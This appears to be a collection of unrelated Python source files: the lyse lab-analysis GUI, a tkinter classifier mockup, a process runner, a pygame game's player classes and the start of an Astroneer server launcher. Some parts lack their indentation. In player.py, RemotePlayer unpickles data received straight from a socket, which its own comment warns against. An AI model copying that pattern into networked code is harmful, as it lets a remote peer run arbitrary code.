self, to_multishot, from_multishot, self.output_box.port, multishot=True)
self.filebox = FileBox(self.ui.verticalLayout_filebox, self.exp_config,
to_singleshot, from_singleshot, to_multishot, from_multishot)
self.last_save_config_file = None
self.last_save_data = None
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionSave_dataframe_as.triggered.connect(lambda: self.on_save_dataframe_triggered(True))
self.ui.actionSave_dataframe.triggered.connect(lambda: self.on_save_dataframe_triggered(False))
self.ui.actionLoad_dataframe.triggered.connect(self.on_load_dataframe_triggered)
self.ui.resize(1600, 900)
# Set the splitters to appropriate fractions of their maximum size:
self.ui.splitter_horizontal.setSizes([1000, 600])
self.ui.splitter_vertical.setSizes([300, 600])
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('lyse', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file, restore_window_geometry)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Load the window geometry now, but then defer the other loading until 50ms
# after the window has shown, so that the GUI pops up faster in the meantime.
try:
self.load_window_geometry_configuration(autoload_config_file)
except Exception:
# ignore error for now and let it be raised again in the call to load_configuration:
restore_window_geometry = True
else:
# Success - skip loading window geometry in load_configuration:
restore_window_geometry = False
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
# self.ui.showMaximized()
def terminate_all_workers(self):
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.end_child()
def workers_terminated(self):
terminated = {}
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.worker.poll()
terminated[routine.filepath] = routine.worker.returncode is not None
return terminated
def are_you_sure(self):
message = ('Current configuration (which scripts are loaded and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
return True
    def on_close_event(self):
        """Handler for the main window closing.

        Returns True to allow the close (after terminating all analysis
        workers) or False to veto it."""
        save_data = self.get_save_data()
        # Only prompt if there is a previously saved state to compare
        # against and something actually changed:
        if self.last_save_data is not None and save_data != self.last_save_data:
            if self.only_window_geometry_is_different(save_data, self.last_save_data):
                # Pure window-geometry changes are saved silently, no prompt:
                self.save_configuration(self.last_save_config_file)
                self.terminate_all_workers()
                return True
            elif not self.are_you_sure():
                # User cancelled the quit dialog:
                return False
        self.terminate_all_workers()
        return True
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
try:
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
except LabConfig.NoOptionError:
self.exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
if not os.path.exists(default_path):
os.makedirs(default_path)
default = os.path.join(default_path, 'lyse.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current lyse configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def only_window_geometry_is_different(self, current_data, old_data):
ui_keys = ['window_size', 'window_pos', 'splitter', 'splitter_vertical', 'splitter_horizontal']
compare = [current_data[key] == old_data[key] for key in current_data.keys() if key not in ui_keys]
return all(compare)
def get_save_data(self):
save_data = {}
box = self.singleshot_routinebox
save_data['SingleShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastSingleShotFolder'] = box.last_opened_routine_folder
box = self.multishot_routinebox
save_data['MultiShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastMultiShotFolder'] = box.last_opened_routine_folder
save_data['LastFileBoxFolder'] = self.filebox.last_opened_shots_folder
save_data['analysis_paused'] = self.filebox.analysis_paused
window_size = self.ui.size()
save_data['window_size'] = (window_size.width(), window_size.height())
window_pos = self.ui.pos()
save_data['window_pos'] = (window_pos.x(), window_pos.y())
save_data['screen_geometry'] = get_screen_geometry()
save_data['splitter'] = self.ui.splitter.sizes()
save_data['splitter_vertical'] = self.ui.splitter_vertical.sizes()
save_data['splitter_horizontal'] = self.ui.splitter_horizontal.sizes()
return save_data
def save_configuration(self, save_file):
lyse_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
lyse_config.set('lyse_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'lyse.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select lyse configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename, restore_window_geometry=True):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s' % filename)
lyse_config = LabConfig(filename)
try:
self.singleshot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'SingleShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.singleshot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastSingleShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'MultiShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastMultiShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.filebox.last_opened_shots_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastFileBoxFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
if ast.literal_eval(lyse_config.get('lyse_state', 'analysis_paused')):
self.filebox.pause_analysis()
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
if restore_window_geometry:
self.load_window_geometry_configuration(filename)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def load_window_geometry_configuration(self, filename):
"""Load only the window geometry from the config file. It's useful to have this
separate from the rest of load_configuration so that it can be called before the
window is shown."""
lyse_config = LabConfig(filename)
try:
screen_geometry = ast.literal_eval(lyse_config.get('lyse_state', 'screen_geometry'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
else:
# Only restore the window size and position, and splitter
# positions if the screen is the same size/same number of monitors
# etc. This prevents the window moving off the screen if say, the
# position was saved when 2 monitors were plugged in but there is
# only one now, and the splitters may not make sense in light of a
# different window size, so better to fall back to defaults:
current_screen_geometry = get_screen_geometry()
if current_screen_geometry == screen_geometry:
try:
self.ui.resize(*ast.literal_eval(lyse_config.get('lyse_state', 'window_size')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.move(*ast.literal_eval(lyse_config.get('lyse_state', 'window_pos')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_vertical.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_vertical')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_horizontal.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_horizontal')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
"hdf5_viewer",
"hdf5_viewer_arguments"],
"paths": ["shared_drive",
"experiment_shot_storage",
"analysislib"],
"ports": ["lyse"]
}
self.exp_config = LabConfig(required_params=required_config_params)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
# Keyboard shortcuts:
QtWidgets.QShortcut('Del', self.ui, lambda: self.delete_items(True))
QtWidgets.QShortcut('Shift+Del', self.ui, lambda: self.delete_items(False))
def on_save_dataframe_triggered(self, choose_folder=True):
df = self.filebox.shots_model.dataframe.copy()
if len(df) > 0:
default = self.exp_config.get('paths', 'experiment_shot_storage')
if choose_folder:
save_path = QtWidgets.QFileDialog.getExistingDirectory(self.ui, 'Select a Folder for the Dataframes', default)
if type(save_path) is tuple:
save_path, _ = save_path
if not save_path:
# User cancelled
return
sequences = df.sequence.unique()
for sequence in sequences:
sequence_df = pandas.DataFrame(df[df['sequence'] == sequence], columns=df.columns).dropna(axis=1, how='all')
labscript = sequence_df['labscript'].iloc[0]
filename = "dataframe_{}_{}.msg".format(sequence.to_pydatetime().strftime("%Y%m%dT%H%M%S"),labscript[:-3])
if not choose_folder:
save_path = os.path.dirname(sequence_df['filepath'].iloc[0])
sequence_df.infer_objects()
for col in sequence_df.columns :
if sequence_df[col].dtype == object:
sequence_df[col] = pandas.to_numeric(sequence_df[col], errors='ignore')
sequence_df.to_msgpack(os.path.join(save_path, filename))
else:
error_dialog('Dataframe is empty')
def on_load_dataframe_triggered(self):
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'dataframe.msg')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select dataframe file to load',
default,
"dataframe files (*.msg)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
df = pandas.read_msgpack(file).sort_values("run time").reset_index()
# Check for changes in the shot files since the dataframe was exported
def changed_since(filepath, time):
if os.path.isfile(filepath):
return os.path.getmtime(filepath) > time
else:
return False
filepaths = df["filepath"].tolist()
changetime_cache = os.path.getmtime(file)
need_updating = np.where(map(lambda x: changed_since(x, changetime_cache), filepaths))[0]
need_updating = np.sort(need_updating)[::-1] # sort in descending order to not remove the wrong items with pop
# Reload the files where changes where made since exporting
for index in need_updating:
filepath = filepaths.pop(index)
self.filebox.incoming_queue.put(filepath)
df = df.drop(need_updating)
self.filebox.shots_model.add_files(filepaths, df, done=True)
def delete_items(self, confirm):
"""Delete items from whichever box has focus, with optional confirmation
dialog"""
if self.filebox.ui.tableView.hasFocus():
self.filebox.shots_model.remove_selection(confirm)
if self.singleshot_routinebox.ui.treeView.hasFocus():
self.singleshot_routinebox.remove_selection(confirm)
if self.multishot_routinebox.ui.treeView.hasFocus():
self.multishot_routinebox.remove_selection(confirm)
if __name__ == "__main__":
    # Entry point: set up logging, create the Qt application and the lyse
    # GUI, start the analysis web server, then run the Qt event loop
    # until the user quits.
    logger = setup_logging('lyse')
    labscript_utils.excepthook.set_logger(logger)
    logger.info('\n\n===============starting===============\n')
    qapplication = QtWidgets.QApplication(sys.argv)
    qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
    app = Lyse()
    # Start the web server:
    splash.update_text('starting analysis server')
    server = WebServer(app.port)
    splash.update_text('done')
    # Let the interpreter run every 500ms so it sees Ctrl-C interrupts:
    timer = QtCore.QTimer()
    timer.start(500)
    timer.timeout.connect(lambda: None)  # Let the interpreter run each 500 ms.
    # Upon seeing a ctrl-c interrupt, quit the event loop
    signal.signal(signal.SIGINT, lambda *args: qapplication.exit())
    splash.hide()
    qapplication.exec_()
    # Qt loop has exited; stop the web server before the process ends:
    server.shutdown()
|
tc_ui0.py | #-*- coding:utf-8 -*-
import tkinter as tk
from tkinter import ttk
import tkinter.filedialog as tkf
import tkinter.messagebox as tkm
import time
import threading
import os
def func_thrd_ExecuteCommand():
    """Worker-thread body: wait briefly, then clear the input text widget."""
    time.sleep(0.01)
    text.delete(0.0, tk.END)
def handle_Input(event):
    """Key handler for the text widget: on Enter (keycode 13), append the
    widget's contents as a new row in the tree, scroll to the bottom, and
    clear the input from a worker thread."""
    if event.keycode != 13:
        return
    global lines
    txt = text.get("0.0", "end")
    tree.insert("", lines, text="", values=(txt, lines))
    tree.yview_moveto(1)
    lines += 1
    worker = threading.Thread(target=func_thrd_ExecuteCommand)
    worker.start()
def callRB():
    """Radiobutton callback: log the selected model's value to the tree."""
    global lines
    tree.insert("", lines, text="", values=(foo.get(), '训练', '文本'))
    tree.yview_moveto(1)
    lines += 1
def filecallback():
    """File-button callback: open a file chooser, insert the chosen path
    into the text widget and log it (or a placeholder row on cancel)."""
    global lines
    chosen = tkf.askopenfilename()
    if chosen != '':
        text.insert(0.0, chosen)
        tree.insert("", lines, text="",
                    values=(chosen, '选择文件:', os.path.basename(chosen)))
    else:
        tree.insert("", lines, text="",
                    values=('选择文件/输入预测文本', '无', '无'))
    tree.yview_moveto(1)
    lines += 1
def traincallback():
    """Train-button callback: log a row and select the newest tree item."""
    global lines
    tree.insert("", lines, text="", values=('训练文本', '训练', '文本'))
    tree.yview_moveto(1)
    lines += 1
    tree.selection_set(tree.get_children()[-1])
def testcallback():
    """Test-button callback: log a placeholder row to the tree."""
    global lines
    tree.insert("", lines, text="", values=('测试文本', '文件', '文本'))
    tree.yview_moveto(1)
    lines += 1
def predcallback():
    """Predict-button callback: log a placeholder row to the tree."""
    global lines
    tree.insert("", lines, text="", values=('预测为本', '文件', '文本'))
    tree.yview_moveto(1)
    lines += 1
if __name__ == "__main__":
    # Build the main window: a one-line text entry at the top, a
    # button/radiobutton toolbar below it, and a scrollable treeview log
    # filling the rest.
    window = tk.Tk()
    window.title('my window')
    window.geometry('500x500')
    window.update()
    window.rowconfigure(0,weight=1)
    window.columnconfigure(0,weight=1)
    # Single-line input; Enter is handled by handle_Input:
    text = tk.Text(window,height=1)
    text.bind('<Key>',func=handle_Input)
    text.pack(side='top',fill='x')
    #text.grid(row=1,columnspan=4,sticky='ew')
    frame=tk.Frame(window)
    frame.pack(side='top',fill='x')
    # Toolbar buttons: file chooser ("..."), train, test, predict:
    btn_file = tk.Button(frame, text ="...", command = filecallback)
    btn_file.grid(row=0,column=0)
    #btn_file.grid(row=1,column=4,sticky='we')
    btn_train = tk.Button(frame, text ="训练", command = traincallback)
    btn_train.grid(row=0,column=1)
    #btn_train.grid(row=2,column=2,sticky='we')
    btn_test = tk.Button(frame, text ="测试", command = testcallback)
    btn_test.grid(row=0,column=2)
    #btn_test.grid(row=2,column=3,sticky='we')
    btn_predict = tk.Button(frame, text ="预测", command = predcallback)
    btn_predict.grid(row=0,column=3)
    #btn_predict.grid(row=2,column=4,sticky='we')
    #frame.grid(row=2,column=1)
    #frame.rowconfigure(0,weight=1)
    #frame.columnconfigure(0,weight=1)
    # Model-selection radio buttons; selected value is stored in foo:
    foo=tk.IntVar(window)
    i=4
    for t, v in [('卷积神经网络', 1), ('朴素贝叶斯', 2), ('逻辑回归', 3)]:
        r = tk.Radiobutton(frame, text=t, value=v,variable=foo,command=callRB)
        #r.grid(row=0,column=i,sticky='w')
        r.grid(row=0,column=i)
        i+=1
    lines=0
    foo.set(1)
    # NOTE(review): Treeview's `height` option is a row count, but this
    # passes a pixel-derived value — presumably intended as pixels;
    # confirm this renders as expected.
    h=window.winfo_height()-text.winfo_height()-frame.winfo_height()
    tree=ttk.Treeview(window,show="headings",height=h,selectmode='browse')
    tree["columns"]=("text","classification","other")
    tree.column("text",width=int(window.winfo_width()*3/5))
    tree.column("classification",width=int(window.winfo_width()/5))
    tree.column("other",width=int(window.winfo_width()/5))
    tree.heading("text",text="输出1",anchor = 'w')
    tree.heading("classification",anchor = 'w',text='输出2')
    tree.heading("other",anchor = 'w',text='输出3')
    #tree.grid(row=4,columnspan=4,sticky='nsew')
    vbar = ttk.Scrollbar(window,orient=tk.VERTICAL,command=tree.yview)
    #vbar.grid(row=4,column=4,sticky='ns')
    vbar.pack(side='right',fill='y')
    tree.configure(yscrollcommand=vbar.set)
    tree.pack(side='bottom',fill='both')
    # Seed the log with 100 numbered rows:
    for j in range(100):
        tree.insert("",lines,text="" ,values=(lines,'文件','文本'))
        lines=lines+1
    window.mainloop()
|
runner.py | import multiprocessing
from ..runner_wrapper import RunnerWrapper
class ProcessRunner(RunnerWrapper):
    """Process Runner Wrapper: executes ``self.run`` in a daemonised
    subprocess."""

    def start(self):
        """Starts runner process.

        Raises:
            RuntimeError: if the runner is already running.
        """
        if self.is_running():
            raise RuntimeError("Can't start an already-running runner")
        self.runner = multiprocessing.Process(target=self.run)
        # Daemonise so the child dies with the parent process:
        self.runner.daemon = True
        self.runner.start()

    def is_running(self):
        """Returns True if runner is active else False.

        Uses getattr so it is safe to call before start() has ever run
        (previously this raised AttributeError if ``self.runner`` was
        unset — assuming the base class doesn't initialise it; confirm
        against RunnerWrapper).
        """
        runner = getattr(self, "runner", None)
        return runner is not None and runner.is_alive()
|
player.py | import pygame
import threading
import pickle
from pathlib import Path
from .gameobject import Player, Action, Weapon
from .base_game import Observation, Cell
class RemotePlayer(Player):
    """Player controlled over a socket: decisions are read from, and
    observations written to, a connection accepted in connect()."""

    def __init__(self, s, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Listening socket; args/kwargs are replayed to the remote client
        # on connect so it can construct a matching player:
        self.s = s
        self.args_kwargs = (args, kwargs)

    def decide(self):
        # WARNING: don't use pickle in production codes
        return pickle.loads(self.conn.recv(256))

    def observe(self, sight):
        self.conn.sendall(pickle.dumps(sight))

    def connect(self):
        """Accept an incoming connection and handshake with the client."""
        self.conn, self.addr = self.s.accept()
        self.conn.__enter__()
        self.conn.sendall(pickle.dumps(self.args_kwargs))
        self.conn.recv(128)

    def __getstate__(self):
        """Drop the unpicklable socket attributes when pickling.

        Pops with a default so pickling also works before connect() has
        been called (previously this raised KeyError because 'conn' and
        'addr' do not exist yet at that point).
        """
        d = self.__dict__.copy()
        d.pop('s', None)
        d.pop('conn', None)
        d.pop('addr', None)
        return d

    def __setstate__(self, state):
        self.__dict__.update(state)
class KeyboardPlayer(Player):
    """Player driven by the local keyboard and rendered with pygame.

    Arrow keys move, space shoots. A background listener thread polls the
    pygame key state so short presses between decide() calls aren't lost.
    """
    # Width in pixels of the fence drawn around the playing field:
    BORDER_SIZE = 25
    # Directory holding the sprite/background images:
    photos_path = Path(__file__).parent / 'photos'

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # [movement, shoot] pending actions, filled by the listener thread:
        self.key_pressed = [Action.NOTHING, Action.NOTHING]
        # Display resources are created lazily on first observe():
        self.loaded = False
        pygame.init()
        listener = threading.Thread(target=self.listener, daemon=True)
        listener.start()

    def decide(self):
        """Return the [movement, shoot] actions gathered since last call."""
        keys = self.key_pressed
        self.key_pressed = [Action.NOTHING, Action.NOTHING]
        # Also drain the event queue, catching presses the polling
        # listener may have missed:
        events = pygame.event.get()
        for event in events:
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_SPACE:
                    keys[1] = Action.SHOOT
                # Stop once a movement has been chosen:
                if keys[0] != Action.NOTHING:
                    break
                if event.key == pygame.K_LEFT:
                    keys[0] = Action.MOVE_LEFT
                elif event.key == pygame.K_RIGHT:
                    keys[0] = Action.MOVE_RIGHT
                elif event.key == pygame.K_UP:
                    keys[0] = Action.MOVE_UP
                elif event.key == pygame.K_DOWN:
                    keys[0] = Action.MOVE_DOWN
        return keys

    def listener(self):
        """Busy-poll the pygame key state forever, recording the latest
        movement and shoot keys into self.key_pressed."""
        while True:
            keys = pygame.key.get_pressed()
            if keys[pygame.K_LEFT]:
                self.key_pressed[0] = Action.MOVE_LEFT
            elif keys[pygame.K_RIGHT]:
                self.key_pressed[0] = Action.MOVE_RIGHT
            elif keys[pygame.K_DOWN]:
                self.key_pressed[0] = Action.MOVE_DOWN
            elif keys[pygame.K_UP]:
                self.key_pressed[0] = Action.MOVE_UP
            if keys[pygame.K_SPACE]:
                self.key_pressed[1] = Action.SHOOT

    def load(self, sight):
        """Create the window and load/scale the static images, once,
        sized from the map dimensions in *sight*."""
        if self.loaded:
            return
        input_map = sight.map_._map
        self.WIDTH, self.HEIGHT = (
            len(input_map[0]) * sight.cell_size + 2 * self.BORDER_SIZE,
            len(input_map) * sight.cell_size + 2 * self.BORDER_SIZE
        )
        self.WIN = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
        pygame.display.set_caption("Brutal story of little Ninja")
        # Horizontal (top/bottom) fence, stretched to the window width:
        self.fence_image_width = pygame.image.load(
            self.photos_path / 'top bottom.png')
        self.fence_w = pygame.transform.scale(
            self.fence_image_width,
            (self.WIDTH, self.BORDER_SIZE))
        # Vertical (left/right) fence:
        self.fence_image_height = pygame.image.load(
            self.photos_path / 'right left.png')
        self.fence_h = pygame.transform.scale(
            self.fence_image_height,
            (self.BORDER_SIZE, self.HEIGHT - 2 * self.BORDER_SIZE))
        # Wall/obstacle sprite, scaled to one map cell:
        self.barier_image = pygame.image.load(self.photos_path / 'Box.png')
        self.barier_size = (sight.cell_size, sight.cell_size)
        self.barier = pygame.transform.scale(self.barier_image,
                                             self.barier_size)
        # Caches: scaled/rotated images keyed by (filename[, angle]);
        # spin angles of weapon sprites keyed by object id:
        self.images = {}
        self.angles = {}
        self.loaded = True

    def get_image(self, object_, angle):
        """Return the object's sprite scaled to its size and rotated by
        *angle* degrees, caching both stages."""
        if object_.gameobject.image not in self.images:
            image = pygame.image.load(
                self.photos_path / object_.gameobject.image)
            self.images[object_.gameobject.image] = pygame.transform.scale(
                image,
                object_.size[::-1]
            )
        if (object_.gameobject.image, angle) not in self.images:
            image = pygame.transform.rotate(
                self.images[object_.gameobject.image],
                angle
            )
            self.images[object_.gameobject.image, angle] = image
        return self.images[object_.gameobject.image, angle]

    def observe(self, sight):
        """Render one frame of the observation: fences, walls, then every
        game object at its position and orientation."""
        self.load(sight)
        background_color = (255, 255, 255)
        self.WIN.fill(background_color)
        # Fences along all four window edges:
        self.WIN.blit(self.fence_w, (0, 0))
        self.WIN.blit(self.fence_w, (0, self.HEIGHT - self.BORDER_SIZE))
        self.WIN.blit(self.fence_h, (0, self.BORDER_SIZE))
        self.WIN.blit(self.fence_h, (self.WIDTH - self.BORDER_SIZE,
                                     self.BORDER_SIZE))
        # Wall cells from the map grid:
        for i, row in enumerate(sight.map_._map):
            for j, cell in enumerate(row):
                if cell == Cell.WALL:
                    top_left_coord = (j * sight.cell_size + self.BORDER_SIZE,
                                      i * sight.cell_size + self.BORDER_SIZE)
                    self.WIN.blit(self.barier, top_left_coord)
        new_angles = {}
        for object_ in sight.objects:
            action = object_.direction.to_action()
            if isinstance(object_.gameobject, Weapon):
                # Weapons spin: advance their angle 12 degrees per frame.
                if id(object_) not in self.angles:
                    angle = 0
                else:
                    angle = self.angles[id(object_)] + 12
                new_angles[id(object_)] = angle
            elif action == Action.MOVE_LEFT:
                angle = 0
            elif action == Action.MOVE_RIGHT:
                angle = 180
            elif action == Action.MOVE_DOWN:
                angle = 90
            elif action == Action.MOVE_UP:
                angle = 270
            # NOTE(review): if a non-weapon's direction maps to none of the
            # four movement actions, `angle` is unbound here and this
            # raises UnboundLocalError — confirm to_action() always
            # returns a movement action for non-weapons.
            image = self.get_image(object_, angle)
            self.WIN.blit(image,
                          (object_.x + self.BORDER_SIZE,
                           object_.y + self.BORDER_SIZE))
        self.angles = new_angles
        pygame.display.update()
class Bot(Player):
    """Player whose actions are produced by a pluggable strategy object."""

    def __init__(self, strategy, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.strategy = strategy
        # Most recent observation, recorded by observe():
        self.state = None

    def decide(self):
        raw_scores = self.strategy.decide(bot=self)
        return self._parse(raw_scores)

    def observe(self, sight: Observation):
        self.state = sight

    @staticmethod
    def _parse(decision: list[float]) -> list[Action]:
        """Turn the strategy's score vector into actions: the index with
        the highest score becomes the action, and if the runner-up is
        index 5, a SHOOT action is appended as well."""
        ranked = sorted(range(len(decision)), key=lambda idx: decision[idx])
        actions = [Action(ranked[-1])]
        if ranked[-2] == 5:
            actions.append(Action.SHOOT)
        return actions
|
AstroLauncher.py | import argparse
import asyncio
import atexit
import ctypes
import dataclasses
import json
import os
import secrets
import shutil
import signal
import socket
import subprocess
import sys
import time
import zipfile
from distutils import dir_util
from threading import Thread
import psutil
from packaging import version
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
import cogs.AstroAPI as AstroAPI
import cogs.AstroWebServer as AstroWebServer
import cogs.ValidateSettings as ValidateSettings
from cogs.AstroDaemon import AstroDaemon
from cogs.AstroDedicatedServer import AstroDedicatedServer
from cogs.AstroLogging import AstroLogging
from cogs.MultiConfig import MultiConfig
from cogs.utils import AstroRequests
from cogs.utils import ALVERSION
"""
Build:
pyinstaller AstroLauncher.py -F --add-data "assets;./assets" --icon=assets/astrolauncherlogo.ico
or
python BuildEXE.py
"""
class AstroLauncher():
""" Starts a new instance of the Server Launcher"""
    @dataclasses.dataclass
    class LauncherConfig():
        """Typed view of the [AstroLauncher] section of Launcher.ini.

        The defaults below are what gets written to a fresh config file;
        __post_init__ coerces whatever was read from the INI to each
        field's declared type and aborts the launcher on failure.
        """
        AutoUpdateLauncherSoftware: bool = True
        AutoUpdateServerSoftware: bool = True
        UpdateOnServerRestart: bool = True
        HideServerConsoleWindow: bool = False
        HideLauncherConsoleWindow: bool = False
        ServerStatusFrequency: float = 2
        PlayfabAPIFrequency: float = 2
        HeartBeatFailRestartServer: int = 8
        DisableBackupRetention: bool = False
        BackupRetentionPeriodHours: float = 72
        BackupRetentionFolderLocation: str = r"Astro\Saved\Backup\LauncherBackups"
        EnableAutoRestart: bool = False
        AutoRestartEveryHours: float = 24
        AutoRestartSyncTimestamp: str = "00:00"
        DisableNetworkCheck: bool = False
        OverwritePublicIP: bool = False
        ShowServerFPSInConsole: bool = True
        AdminAutoConfigureFirewall: bool = True
        LogRetentionDays: int = 7
        DiscordWebHookURL: str = ""
        DiscordWebHookLevel: str = "cmd"
        RODataURL: str = secrets.token_hex(16)
        DisableWebServer: bool = False
        WebServerPort: int = 5000
        WebServerPasswordHash: str = ""
        WebServerBaseURL: str = "/"
        EnableWebServerSSL: bool = False
        SSLPort: int = 443
        SSLCertFile: str = ""
        SSLKeyFile: str = ""
        CPUAffinity: str = ""

        def __post_init__(self):
            # pylint: disable=no-member
            # Coerce every field to its annotated type, collecting all
            # errors before exiting so the user sees every bad option.
            # NOTE(review): data.type is the annotation's type object, and
            # bool("False") is True — presumably string booleans are parsed
            # upstream before reaching here; confirm in MultiConfig.
            hasError = False
            for field, data in self.__dataclass_fields__.items():
                try:
                    self.__dict__[field] = data.type(self.__dict__[field])
                except ValueError:
                    hasError = True
                    AstroLogging.logPrint(
                        f"INI error: {field} must be of type {data.type.__name__}", "critical")
            if hasError:
                AstroLogging.logPrint(
                    "Fix your launcher config file!", "critical")
                sys.exit()
class SaveHandler(FileSystemEventHandler):
def __init__(self, launcher):
self.launcher = launcher
self.astroPath = self.launcher.astroPath
self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
super().__init__()
def on_created(self, event):
# print(event)
# time.sleep(1)
try:
time.sleep(0.5)
dirName = os.path.dirname(event.src_path)
fileNames = [os.path.join(dirName, f) for f in os.listdir(
dirName) if os.path.isfile(os.path.join(dirName, f))]
# print(fileNames)
fileName = sorted(
